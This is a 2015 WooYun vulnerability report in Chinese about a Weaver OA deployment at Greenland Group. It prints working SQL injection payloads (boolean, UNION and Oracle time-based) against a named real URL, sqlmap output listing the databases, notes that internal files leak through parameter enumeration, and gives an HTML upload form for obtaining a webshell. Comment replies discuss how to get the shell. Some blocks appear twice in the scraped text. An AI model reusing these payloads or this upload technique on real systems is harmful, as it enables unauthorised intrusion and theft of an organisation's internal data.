国企绿地集团泛微OA系统sql注入+内部信息泄漏+getshell（root）

发表于 2015年07月30日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0130481

漏洞标题：国企绿地集团泛微OA系统sql注入+内部信息泄漏+getshell（root）

漏洞详情

披露状态：

2015-07-30: 积极联系厂商并且等待厂商认领中，细节不对外公开
2015-09-13: 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

绿地集团是中国第一家也是目前（截止2013年）唯一一家跻身《财富》世界500强的以房地产为主业的企业集团。2014年位居《财富》世界500强第268位。

详细说明：

http://home.ldjt.com.cn/weaver/weaver.email.FileDownloadLocation?fileid=32&download=1

1	http://home.ldjt.com.cn/weaver/weaver.email.FileDownloadLocation?fileid=32&download=1

看见是泛微的oa，直接在wooyun上搜了下，发现挺多利用漏洞，就不一一贴出来参考了哪些。1.注入参数：fileid

Place: GET<br>
Parameter: fileid<br>
    Type: boolean-based blind<br>
    Title: AND boolean-based blind - WHERE or HAVING clause<br>
    Payload: fileid=32 AND 1250=1250&download=1Type: UNION query<br>
    Title: Generic UNION query (NULL) - 7 columns<br>
    Payload: fileid=-6867 UNION ALL SELECT CHR(58)||CHR(120)||CHR(97)||CHR(113)|<br>
|CHR(58)||CHR(103)||CHR(70)||CHR(100)||CHR(87)||CHR(111)||CHR(82)||CHR(115)||CHR<br>
(97)||CHR(103)||CHR(89)||CHR(58)||CHR(116)||CHR(113)||CHR(103)||CHR(58), NULL, N<br>
ULL, NULL, NULL, NULL, NULL FROM DUAL-- &download=1Type: AND/OR time-based blind<br>
    Title: Oracle AND time-based blind<br>
    Payload: fileid=32 AND 1259=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(100)||CHR<br>
(83)||CHR(67),5)&download=1

Place: GET

Parameter: fileid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: fileid=32 AND 1250=1250&download=1Type: UNION query

Title: Generic UNION query (NULL) - 7 columns

Payload: fileid=-6867 UNION ALL SELECT CHR(58)||CHR(120)||CHR(97)||CHR(113)|

|CHR(58)||CHR(103)||CHR(70)||CHR(100)||CHR(87)||CHR(111)||CHR(82)||CHR(115)||CHR

(97)||CHR(103)||CHR(89)||CHR(58)||CHR(116)||CHR(113)||CHR(103)||CHR(58), NULL, N

ULL, NULL, NULL, NULL, NULL FROM DUAL-- &download=1Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: fileid=32 AND 1259=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(100)||CHR

(83)||CHR(67),5)&download=1

available databases [19]:<br>
[*] APEX_030200<br>
[*] APPQOSSYS<br>
[*] CTXSYS<br>
[*] DBSNMP<br>
[*] DUROAX<br>
[*] EXFSYS<br>
[*] FLOWS_FILES<br>
[*] MDSYS<br>
[*] OLAPSYS<br>
[*] ORDDATA<br>
[*] ORDSYS<br>
[*] OUTLN<br>
[*] OWBSYS<br>
[*] SCOTT<br>
[*] SYS<br>
[*] SYSMAN<br>
[*] SYSTEM<br>
[*] WMSYS<br>
[*] XDB

available databases [19]:

[*] APEX_030200

[*] APPQOSSYS

[*] CTXSYS

[*] DBSNMP

[*] DUROAX

[*] EXFSYS

[*] FLOWS_FILES

[*] MDSYS

[*] OLAPSYS

[*] ORDDATA

[*] ORDSYS

[*] OUTLN

[*] OWBSYS

[*] SCOTT

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] WMSYS

[*] XDB

漏洞证明：

通过遍历fileid参数，发现很多内部文件，下面举一两例子证明下

1	通过遍历fileid参数，发现很多内部文件，下面举一两例子证明下

3.利用表单提交

<form method='post' action='http://www.xxoo.com/tools/SWFUpload/upload.jsp'  enctype="multipart/form-data" ><br>
<input type="file" name="test"  /><br>
<button type=submit value="getshell">getshell</button> </form>

<button type=submit value="getshell">getshell</button> </form>

直接getshell

内部东西应该很多，就不深入了。

修复方案：

升级打补丁。

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

评价

2010-01-01 00:00 李叫兽就四李叫兽白帽子 | Rank:0 漏洞数:0)
如何利用表单提交获得shell？求联系方式，我q372941497
2010-01-01 00:00 ShAdow丶白帽子 | Rank:70 漏洞数:5)
@李叫兽就四李叫兽就是自己构造上传表单这个洞我也参看了泛微OA的洞里面有exp的。

原文连接：国企绿地集团泛微OA系统sql注入+内部信息泄漏+getshell（root） 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。